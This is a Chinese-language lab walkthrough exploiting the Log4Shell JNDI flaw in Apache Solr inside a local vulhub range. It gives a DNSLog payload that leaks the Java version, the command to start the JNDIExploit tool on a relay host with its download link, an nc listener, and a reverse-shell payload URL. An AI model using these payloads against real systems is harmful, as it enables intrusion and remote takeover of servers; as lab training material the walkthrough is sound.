使用kali上的vulhub去打开
我们输入在kali当前终端输入docker-compose up -d --build
启动靶场
但是启动靶场时出现了报错问题,网上搜索解决方法
解决方法:给管理权限
在kali终端输入:sudo docker-compose up -d
下面可以看到靶场正在启动
接着输入 http://127.0.0.1:8983/solr/#/
可以看到靶场成功打开
Dnslog测试
DNSLog Platform //dnslog平台网址
我们在kali上第二个窗口打开dnslog平台进行记录,点击get subdomain请求一个dns域名
得到dns域名:lfjceo.dnslog.cn
在靶场上传参:/admin/cores?action=${jndi:ldap://${sys:java.version}.lfjceo.dnslog.cn}http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.lfjceo.dnslog.cn}
点一下右边那个refresh,查看dns
此时直接得到版本信息:1.8.0
进入最后一步,反弹shell
反弹shell需要使用JNDIExploit.v1.2,可以从下面百度网盘直接下载:
https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5
中转机:10.211.55.3
中转机java版本:1.8.0_172
首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar
文件使用java启动,命令如下:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.211.55.3
其中:10.211.55.3
为中转机的ip地址
然后在攻击机上开启监听:
nc -lvvp 6666
此时构造如下命令: (payload构造不需要经过base64编码)
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://10.211.55.3:1389/Basic/ReverseShell/10.211.55.23/6666}
http://127.0.0.1:8983
为靶机的地址
10.211.55.3
为中转机地址
10.211.55.23
为Kali攻击机ip地址,此时要反弹shell
执行,反弹shell
打开中转机
成功,我们需要清除靶机
docker-compose down